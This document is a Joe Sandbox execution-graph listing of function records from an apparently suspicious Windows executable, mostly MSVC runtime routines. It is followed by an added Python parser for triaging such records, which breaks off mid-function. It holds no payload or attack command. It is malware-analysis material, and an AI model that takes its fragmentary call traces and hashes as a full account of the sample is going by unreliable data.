                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
                                                                                          • String ID: PK@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                          • API String ID: 1430062303-1665715117
                                                                                          • Opcode ID: f2629828ccd82f9dedb0259bdfbfcbfa0419decc2ad87fecf373c6f7c7a59303
                                                                                          • Instruction ID: 03cbc603835c7803001d72c86729f54839894d91291aadcc3d6db1ecc7fffed5
                                                                                          • Opcode Fuzzy Hash: f2629828ccd82f9dedb0259bdfbfcbfa0419decc2ad87fecf373c6f7c7a59303
                                                                                          • Instruction Fuzzy Hash: 6911A5B14083018FD308EF56C54594FBBE8AED4748F144A2FB58577182DBB8E648CBAB
                                                                                          APIs
                                                                                          • SetCommState.KERNEL32(00000000,00000000,004259CB,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 004252BB
                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 004252C3
                                                                                          • SetSystemPowerState.KERNEL32(00000000,00000000), ref: 004252CD
                                                                                          • GetWindowsDirectoryW.KERNEL32(31DC30DB,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 004252DA
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,6766C36F,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 004252EB
                                                                                          • GetCompressedFileSizeW.KERNEL32(00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 004252F8
                                                                                          • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 0042530C
                                                                                          • FoldStringW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00425322
                                                                                          • ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00425334
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DirectoryState$CommCompressedConsoleCreateFoldInputPowerRemoveReplaceSizeStringSystemWindowsWrite
                                                                                          • String ID:
                                                                                          • API String ID: 1778575968-0
                                                                                          • Opcode ID: 4f6f39edf005aeda46af50a8d518a755cc1789faee46958ee84425fef034561a
                                                                                          • Instruction ID: 4ee983ede31843d0677571ecc916d42194daf4686eb8a74a58ff005235dbce6b
                                                                                          • Opcode Fuzzy Hash: 4f6f39edf005aeda46af50a8d518a755cc1789faee46958ee84425fef034561a
                                                                                          • Instruction Fuzzy Hash: 98114835248381FFF3509B90DD4AFA97764BB48B02F50452DF3C9AA5E1D6B45484CB2A
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00405FF0
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00406016
                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040609A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 004060A9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004060BE
                                                                                          • std::locale::facet::_Facet_Register.LIBCPMT ref: 004060D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                          • String ID: bad cast
                                                                                          • API String ID: 2427920155-3145022300
                                                                                          • Opcode ID: 2f85457529f0a299cb2ba089f9c46beda69e4d9d9e2ea0c3dfd25dd9dcffc868
                                                                                          • Instruction ID: 4d3893fe6a5c30eef50f402383afd780c5eaa7b892cf66508f73834e293ec009
                                                                                          • Opcode Fuzzy Hash: 2f85457529f0a299cb2ba089f9c46beda69e4d9d9e2ea0c3dfd25dd9dcffc868
                                                                                          • Instruction Fuzzy Hash: AB31F0706443018FC724EF15C881B5A77E0EB10324F56863EE4A7772E1DB38A895CB9A
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00428828,00000008,0040A7A5,00000000,00000000,?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A6AE
                                                                                          • __lock.LIBCMT ref: 0040A6E2
                                                                                            • Part of subcall function 0040B8DE: __mtinitlocknum.LIBCMT ref: 0040B8F4
                                                                                            • Part of subcall function 0040B8DE: __amsg_exit.LIBCMT ref: 0040B900
                                                                                            • Part of subcall function 0040B8DE: EnterCriticalSection.KERNEL32(00000000,00000000,?,0040A6E7,0000000D), ref: 0040B908
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 0040A6EF
                                                                                          • __lock.LIBCMT ref: 0040A703
                                                                                          • ___addlocaleref.LIBCMT ref: 0040A721
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                          • String ID: KERNEL32.DLL$LwP<Mw`Lw
                                                                                          • API String ID: 637971194-2887460716
                                                                                          • Opcode ID: de087aec9d934676807015c443d5866b82b43fcc768da9d2f79c2e01d7bdb0c6
                                                                                          • Instruction ID: 50e25b481ea5cafad60f57b810cc0dba0d2538eb25abbed6797350047c624630
                                                                                          • Opcode Fuzzy Hash: de087aec9d934676807015c443d5866b82b43fcc768da9d2f79c2e01d7bdb0c6
                                                                                          • Instruction Fuzzy Hash: 4501A171440700DBD720AF66D906709FBF0EF50315F20852FE895A76E0CBB8A544CB5E
                                                                                          APIs
                                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?), ref: 0040936B
                                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 004093A4
                                                                                          • __freea.LIBCMT ref: 0040943C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$__freea
                                                                                          • String ID:
                                                                                          • API String ID: 172395558-0
                                                                                          • Opcode ID: a9c929b235f93f46a49c6e35ea80cc13d2fa22439db03f388dccc7363f527298
                                                                                          • Instruction ID: cc443e5145269d73018cddfaaf90ae8c1dbef481df038db2ea501d94d0459fb4
                                                                                          • Opcode Fuzzy Hash: a9c929b235f93f46a49c6e35ea80cc13d2fa22439db03f388dccc7363f527298
                                                                                          • Instruction Fuzzy Hash: AF415E7290410AFBDF019F91CC818AE7B76EB88354F54847BF914B61A2C7398D629F58
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(00000001,00000000,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 004078F8
                                                                                          • DecodePointer.KERNEL32(?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 00407905
                                                                                          • __realloc_crt.LIBCMT ref: 00407942
                                                                                          • __realloc_crt.LIBCMT ref: 00407958
                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 0040796A
                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 0040797E
                                                                                          • EncodePointer.KERNEL32(-00000004,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 00407986
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                          • String ID:
                                                                                          • API String ID: 4108716018-0
                                                                                          • Opcode ID: 16dd7e7df1c3487b6bcbbad794b2dafa116b3c013bda22862baffe7fd9668bef
                                                                                          • Instruction ID: 3b940898ccd266a2d8bf858ff7e1816e62fa3607815d32cdb693c61a23b8cc4f
                                                                                          • Opcode Fuzzy Hash: 16dd7e7df1c3487b6bcbbad794b2dafa116b3c013bda22862baffe7fd9668bef
                                                                                          • Instruction Fuzzy Hash: CD11D672A04215AFEB109F29ED80D9A7BDAEB45320310453BE405F72A1EB79FC408B88
                                                                                          APIs
                                                                                          • __getptd_noexit.LIBCMT ref: 004085AC
                                                                                            • Part of subcall function 0040A751: GetLastError.KERNEL32(?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A755
                                                                                            • Part of subcall function 0040A751: ___set_flsgetvalue.LIBCMT ref: 0040A763
                                                                                            • Part of subcall function 0040A751: __calloc_crt.LIBCMT ref: 0040A777
                                                                                            • Part of subcall function 0040A751: DecodePointer.KERNEL32(00000000,?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A791
                                                                                            • Part of subcall function 0040A751: GetCurrentThreadId.KERNEL32 ref: 0040A7A7
                                                                                            • Part of subcall function 0040A751: SetLastError.KERNEL32(00000000,?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A7BF
                                                                                          • __calloc_crt.LIBCMT ref: 004085CE
                                                                                          • __get_sys_err_msg.LIBCMT ref: 004085EC
                                                                                          • _strcpy_s.LIBCMT ref: 004085F4
                                                                                          • __invoke_watson.LIBCMT ref: 00408609
                                                                                          Strings
                                                                                          • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004085B9, 004085DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                          • API String ID: 3117964792-798102604
                                                                                          • Opcode ID: 5b9437e124df2a9f9cccf629ee88ae42165214273238358d56f680335241dea1
                                                                                          • Instruction ID: f0c7397406b5bf017591f2fa3c0236cd0798a78000f9480ad363abfec1e6c413
                                                                                          • Opcode Fuzzy Hash: 5b9437e124df2a9f9cccf629ee88ae42165214273238358d56f680335241dea1
                                                                                          • Instruction Fuzzy Hash: 93F024726043143BDB253A2A5E8196B729C8B6076CB11453FF689B72D1EE3DCD4082AE
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404B93
                                                                                          • std::exception::exception.LIBCMT ref: 00404BCE
                                                                                            • Part of subcall function 00407340: std::exception::_Copy_str.LIBCMT ref: 0040735B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00404BE5
                                                                                            • Part of subcall function 004080C1: RaiseException.KERNEL32(00000004,?,?,>@), ref: 00408103
                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404BEC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                                          • String ID: PK@$bad locale name
                                                                                          • API String ID: 73090415-3645230704
                                                                                          • Opcode ID: cc1387ebdadb7268b5fba507bbcc00dbba370bd00de3eb0b1a7c68e4c4aa6c23
                                                                                          • Instruction ID: da9e5ed7a18f1a670e15eaa26a13f12b073dbedc47fc89f59813c6b0ef5b5f7c
                                                                                          • Opcode Fuzzy Hash: cc1387ebdadb7268b5fba507bbcc00dbba370bd00de3eb0b1a7c68e4c4aa6c23
                                                                                          • Instruction Fuzzy Hash: 311186B15097809FC310DF1A8481A4BFFE4BB58714F808A6FF1D963681C738A608CB6A
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 00407A9E
                                                                                            • Part of subcall function 00407564: __FF_MSGBANNER.LIBCMT ref: 0040757D
                                                                                            • Part of subcall function 00407564: __NMSG_WRITE.LIBCMT ref: 00407584
                                                                                            • Part of subcall function 00407564: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004099C8,00000000,00000001,00000000,?,0040B869,00000018,00428878,0000000C,0040B8F9), ref: 004075A9
                                                                                          • std::exception::exception.LIBCMT ref: 00407AD3
                                                                                          • std::exception::exception.LIBCMT ref: 00407AED
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00407AFE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                          • String ID: K@$bad allocation
                                                                                          • API String ID: 1414122017-1384542263
                                                                                          • Opcode ID: 65de17107ea0a47686f892a3af2d3f24cef5a89699381e8d192bff2aeaafe991
                                                                                          • Instruction ID: 1939afae9243ad08d1e2e4bd9083f1f83463ba83aa0ae8e6705c1db59e0ff189
                                                                                          • Opcode Fuzzy Hash: 65de17107ea0a47686f892a3af2d3f24cef5a89699381e8d192bff2aeaafe991
                                                                                          • Instruction Fuzzy Hash: 91F0F970F082196ADB54EB52DC01A9E37A89B40748F54407FF804B71E1DB7CAB85CB9E
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 0040C6CD
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040C6DE
                                                                                          • __getptd.LIBCMT ref: 0040C6EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                          • String ID: MOC$RCC$csm
                                                                                          • API String ID: 803148776-2671469338
                                                                                          • Opcode ID: f4355893555f86aa4f266521807de2b4abd94cef2b83460923fe1a8fc58e9016
                                                                                          • Instruction ID: f05a84b7e226a0ce95e0330a2d99a0a882557fb88b877ce563c557ec77daf802
                                                                                          • Opcode Fuzzy Hash: f4355893555f86aa4f266521807de2b4abd94cef2b83460923fe1a8fc58e9016
                                                                                          • Instruction Fuzzy Hash: 16E09230110208CFC7309774C08A76932A1EB48709F1559B7E50CEB3A3C73ED890AA5B
                                                                                          APIs
                                                                                          • __CreateFrameInfo.LIBCMT ref: 0040C986
                                                                                            • Part of subcall function 004083EC: __getptd.LIBCMT ref: 004083FA
                                                                                            • Part of subcall function 004083EC: __getptd.LIBCMT ref: 00408408
                                                                                          • __getptd.LIBCMT ref: 0040C990
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040C99E
                                                                                          • __getptd.LIBCMT ref: 0040C9AC
                                                                                          • __getptd.LIBCMT ref: 0040C9B7
                                                                                          • _CallCatchBlock2.LIBCMT ref: 0040C9DD
                                                                                            • Part of subcall function 00408491: __CallSettingFrame@12.LIBCMT ref: 004084DD
                                                                                            • Part of subcall function 0040CA84: __getptd.LIBCMT ref: 0040CA93
                                                                                            • Part of subcall function 0040CA84: __getptd.LIBCMT ref: 0040CAA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1602911419-0
                                                                                          • Opcode ID: ea18aaa508b914f453c6c944b34dbab755f83e4c71c447c13bc04cebec951207
                                                                                          • Instruction ID: 6ffba10e2211504aed184b9c0c0023e470d4c600684c076955474923db7f4312
                                                                                          • Opcode Fuzzy Hash: ea18aaa508b914f453c6c944b34dbab755f83e4c71c447c13bc04cebec951207
                                                                                          • Instruction Fuzzy Hash: 6711E4B1D10309DFDB00EFA5C545BAEBBB1FB08319F10846EE854A7291DB389A119F59
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: DecodePointer__call_reportfault_raise
                                                                                          • String ID: PNfw
                                                                                          • API String ID: 2042925533-1837848778
                                                                                          • Opcode ID: 504db6a2d7f41632d352348e1aa51638ec00ea8521389a229b2be467b8d14729
                                                                                          • Instruction ID: 58946ac6583beb0d35b8e319fd5c8e34357b9acd4ee0e7bc28078f45c67ecff3
                                                                                          • Opcode Fuzzy Hash: 504db6a2d7f41632d352348e1aa51638ec00ea8521389a229b2be467b8d14729
                                                                                          • Instruction Fuzzy Hash: C4E01A60B9828A2AF52173A26C1BB6A11044F94B1DF48403F7A04781C3EAFD9951986F
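The records in this listing are one-per-function, machine-generated, and the ones shown here (the LCMapStringW wrapper, EncodePointer/DecodePointer cookie handling, the strerror helper with its "Visual C++ CRT" string, bad allocation / bad locale name throwers, the __getptd family) look like MSVC CRT runtime code rather than the loader's own logic, which is what an analyst wants to filter out before reading the rest. The following Python is an added example, not part of the Joe Sandbox report: it parses such records (direct API calls, "Part of subcall function" entries, strings with xrefs, and the Similarity key/values), strips the "Download File" link label that extraction fused onto the dump names, and flags records whose calls are all CRT helpers. The sample input is copied from two entries above with indentation removed; the CRT allowlist of KERNEL32 functions is an assumption of this example, not a Joe Sandbox classification.

```python
"""Parse per-function records from a Joe Sandbox execution-graph listing and
flag the ones that look like MSVC CRT library code rather than sample logic."""
import re
from dataclasses import dataclass, field

# Constructed input: two records copied from the listing above, indentation removed.
SAMPLE = """\
APIs
• LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?), ref: 0040936B
• LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 004093A4
• __freea.LIBCMT ref: 0040943C
Memory Dump Source
• Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: String$__freea
• String ID:
• API String ID: 172395558-0
• Instruction Fuzzy Hash: AF415E7290410AFBDF019F91CC818AE7B76EB88354F54847BF914B61A2C7398D629F58
APIs
• __getptd_noexit.LIBCMT ref: 004085AC
  • Part of subcall function 0040A751: GetLastError.KERNEL32(?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A755
  • Part of subcall function 0040A751: DecodePointer.KERNEL32(00000000,?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A791
• __calloc_crt.LIBCMT ref: 004085CE
• __invoke_watson.LIBCMT ref: 00408609
Strings
• Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004085B9, 004085DC
Memory Dump Source
• Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
• String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
• Instruction Fuzzy Hash: 93F024726043143BDB253A2A5E8196B729C8B6076CB11453FF689B72D1EE3DCD4082AE
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>[\w:@$~]+?)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<xrefs>.*)$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")

CRT_MODULES = {"LIBCMT", "LIBCPMT"}
# Assumption for this example: KERNEL32 imports that MSVC CRT helpers call themselves.
CRT_WIN32 = {"LCMapStringW", "EncodePointer", "DecodePointer", "GetLastError",
             "SetLastError", "GetCurrentThreadId", "HeapAlloc", "RaiseException"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (name, module, args, ref) called directly
    subcalls: list = field(default_factory=list)  # (callee, name, module, ref) one level down
    strings: list = field(default_factory=list)   # (text, [xref addresses])
    meta: dict = field(default_factory=dict)      # first value per Similarity/dump-source key
    unparsed: list = field(default_factory=list)  # lines that matched no known shape


def parse_records(text):
    """Split the listing at each 'APIs' header and parse one FunctionRecord per function."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                      # every record opens with its APIs block
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
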